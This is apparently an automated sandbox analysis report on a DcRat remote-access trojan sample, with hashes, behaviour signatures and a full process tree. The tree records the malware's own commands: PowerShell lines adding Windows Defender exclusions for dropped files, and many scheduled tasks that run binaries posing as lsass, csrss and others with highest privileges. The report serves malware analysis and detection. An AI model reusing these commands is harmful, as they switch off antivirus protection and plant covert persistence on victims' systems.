Analysis

  • max time kernel
    147s
  • max time network
    144s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    21-12-2024 18:32

General

  • Target

    JaffaCakes118_25b231411fd9b3166d4beab0dd8ae0cfbcf68e55baa52fd278fa46898e6e0a1a.exe

  • Size

    1.3MB

  • MD5

    378006af49b98b659391f3ed91761531

  • SHA1

    05b2ce29ddea4f38f5f45bc4487d16f5f093cb05

  • SHA256

    25b231411fd9b3166d4beab0dd8ae0cfbcf68e55baa52fd278fa46898e6e0a1a

  • SHA512

    f63dcef41d20703613cb5d7e64166b999f2e8b2f35431111b5b631da54cb4a0cfbae19e19ac984e9afef63ad0bd2ca36264557f9dd2a59a10ffb1c874aac261f

  • SSDEEP

    24576:U2G/nvxW3Ww0t6TnzGmVBDh4+aknuRRZJND0gFJ4rD/IjC:UbA30GnzV/q+DnsXg

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Dcrat family
  • Process spawned unexpected child process 39 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • DCRat payload 12 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 12 IoCs
  • Loads dropped DLL 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs
  • Drops file in Program Files directory 15 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 39 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 37 IoCs
  • Suspicious use of AdjustPrivilegeToken 27 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_25b231411fd9b3166d4beab0dd8ae0cfbcf68e55baa52fd278fa46898e6e0a1a.exe
    "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_25b231411fd9b3166d4beab0dd8ae0cfbcf68e55baa52fd278fa46898e6e0a1a.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1972
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3036
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\providercommon\1zu9dW.bat" "
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2652
        • C:\providercommon\DllCommonsvc.exe
          "C:\providercommon\DllCommonsvc.exe"
          4⤵
          • Executes dropped EXE
          • Drops file in Program Files directory
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1428
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2260
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Photo Viewer\lsass.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2284
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Mail\de-DE\WmiPrvSE.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2148
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Start Menu\Idle.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2664
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\conhost.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1640
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Idle.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2420
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\wininit.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2408
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Saved Games\lsass.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2948
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\dllhost.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2060
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\YtdDrdHd9N.bat"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1496
            • C:\Windows\system32\w32tm.exe
              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
              6⤵
                PID:1636
              • C:\providercommon\DllCommonsvc.exe
                "C:\providercommon\DllCommonsvc.exe"
                6⤵
                • Executes dropped EXE
                • Drops file in Program Files directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2596
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1564
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\WMIADAP.exe'
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:272
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\lsass.exe'
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:592
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Uninstall Information\spoolsv.exe'
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2452
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\Lang\csrss.exe'
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2120
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe'
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1096
                • C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe
                  "C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2152
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\IrGY9odMle.bat"
                    8⤵
                      PID:2988
                      • C:\Windows\system32\w32tm.exe
                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        9⤵
                          PID:2308
                        • C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe
                          "C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe"
                          9⤵
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2068
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\tYG4XGbOex.bat"
                            10⤵
                              PID:3048
                              • C:\Windows\system32\w32tm.exe
                                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                11⤵
                                  PID:896
                                • C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe
                                  "C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe"
                                  11⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1824
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\EUl4QLAvAv.bat"
                                    12⤵
                                      PID:1168
                                      • C:\Windows\system32\w32tm.exe
                                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                        13⤵
                                          PID:2828
                                        • C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe
                                          "C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe"
                                          13⤵
                                          • Executes dropped EXE
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2008
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\nAABNdhKLs.bat"
                                            14⤵
                                              PID:2664
                                              • C:\Windows\system32\w32tm.exe
                                                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                15⤵
                                                  PID:2312
                                                • C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe
                                                  "C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe"
                                                  15⤵
                                                  • Executes dropped EXE
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2356
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\410ZzJtAuR.bat"
                                                    16⤵
                                                      PID:2092
                                                      • C:\Windows\system32\w32tm.exe
                                                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                        17⤵
                                                          PID:2704
                                                        • C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe
                                                          "C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe"
                                                          17⤵
                                                          • Executes dropped EXE
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:3064
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\asjVMp8zxr.bat"
                                                            18⤵
                                                              PID:2628
                                                              • C:\Windows\system32\w32tm.exe
                                                                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                19⤵
                                                                  PID:2228
                                                                • C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe
                                                                  "C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe"
                                                                  19⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1540
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\X5jGqiFaSS.bat"
                                                                    20⤵
                                                                      PID:2396
                                                                      • C:\Windows\system32\w32tm.exe
                                                                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                        21⤵
                                                                          PID:2524
                                                                        • C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe
                                                                          "C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe"
                                                                          21⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2604
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\jaxwQXfGLd.bat"
                                                                            22⤵
                                                                              PID:2240
                                                                              • C:\Windows\system32\w32tm.exe
                                                                                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                23⤵
                                                                                  PID:1012
                                                                                • C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe
                                                                                  "C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe"
                                                                                  23⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:2476
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\KVYyjDtEXm.bat"
                                                                                    24⤵
                                                                                      PID:1004
                                                                                      • C:\Windows\system32\w32tm.exe
                                                                                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                        25⤵
                                                                                          PID:1724
                                                                                        • C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe
                                                                                          "C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe"
                                                                                          25⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:1380
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Photo Viewer\lsass.exe'" /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2700
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\lsass.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2876
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Photo Viewer\lsass.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2868
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Mail\de-DE\WmiPrvSE.exe'" /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2912
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\de-DE\WmiPrvSE.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2860
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Mail\de-DE\WmiPrvSE.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2788
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\Start Menu\Idle.exe'" /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2600
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\All Users\Start Menu\Idle.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2688
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Start Menu\Idle.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2620
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Portable Devices\conhost.exe'" /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:676
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\conhost.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2476
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Portable Devices\conhost.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2840
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Idle.exe'" /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2472
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Idle.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:1852
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Idle.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:592
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\wininit.exe'" /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:1144
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\wininit.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2628
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\wininit.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2316
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\Saved Games\lsass.exe'" /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:1948
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\Admin\Saved Games\lsass.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:1460
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\Saved Games\lsass.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:1836
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\dllhost.exe'" /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2936
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\dllhost.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2828
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\dllhost.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2932
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "WMIADAPW" /sc MINUTE /mo 11 /tr "'C:\providercommon\WMIADAP.exe'" /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:788
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "WMIADAP" /sc ONLOGON /tr "'C:\providercommon\WMIADAP.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:944
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "WMIADAPW" /sc MINUTE /mo 8 /tr "'C:\providercommon\WMIADAP.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:1704
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 10 /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\lsass.exe'" /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:1848
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\lsass.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:804
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\lsass.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:1808
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Uninstall Information\spoolsv.exe'" /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2184
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Uninstall Information\spoolsv.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2820
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Uninstall Information\spoolsv.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2972
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Program Files\7-Zip\Lang\csrss.exe'" /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2752
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\csrss.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2808
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Lang\csrss.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:316
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "lsml" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe'" /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2952
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:584
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "lsml" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:1852

                                        Network

                                        MITRE ATT&CK Enterprise v15

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                          Filesize

                                          342B

                                          MD5

                                          202e1a3f49cbb5112334d83081952c16

                                          SHA1

                                          3b77c43cb7af7eb6db50c90128ebafe526e52100

                                          SHA256

                                          b27bac8de87b65c46abd2e7aa426d15e73e5a1d3ac5fc15953584a5d819d5c44

                                          SHA512

                                          302b2788a292ed5068228897f95dd2497861afd8f0467bbb92b65a2f17370bb886f2f5c8fafebdae469175f428fb64d17937cbfa54d47655807469f12d0bc3ce

                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                          Filesize

                                          342B

                                          MD5

                                          e2c0871ee9473f12b75d9c8b4b0489d2

                                          SHA1

                                          9eaacff29ff8698d9da7eb4e0d64211e75cdf42d

                                          SHA256

                                          e6fff40a7393f8a0a63f8023e3e3d753bada377d7a6a2cafa52bd78d9ca8fd7f

                                          SHA512

                                          68f546082fdf04eb9aa64caf1d68be457fc7ad69a8bca6756eff16e4b28940c59469dc78824120ccf1a37f16d54117255b87431a3e5eb06c588109bbf3c059ba

                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                          Filesize

                                          342B

                                          MD5

                                          eb5ced5e96ffb5eb9ca2427b91404a38

                                          SHA1

                                          e9e2a9a106c7a1caae7ebd53e14ea030755d8001

                                          SHA256

                                          0d79955d3c406c38206ca17d9a1f72f1ffc1e538dcf25111549307fd607bdcef

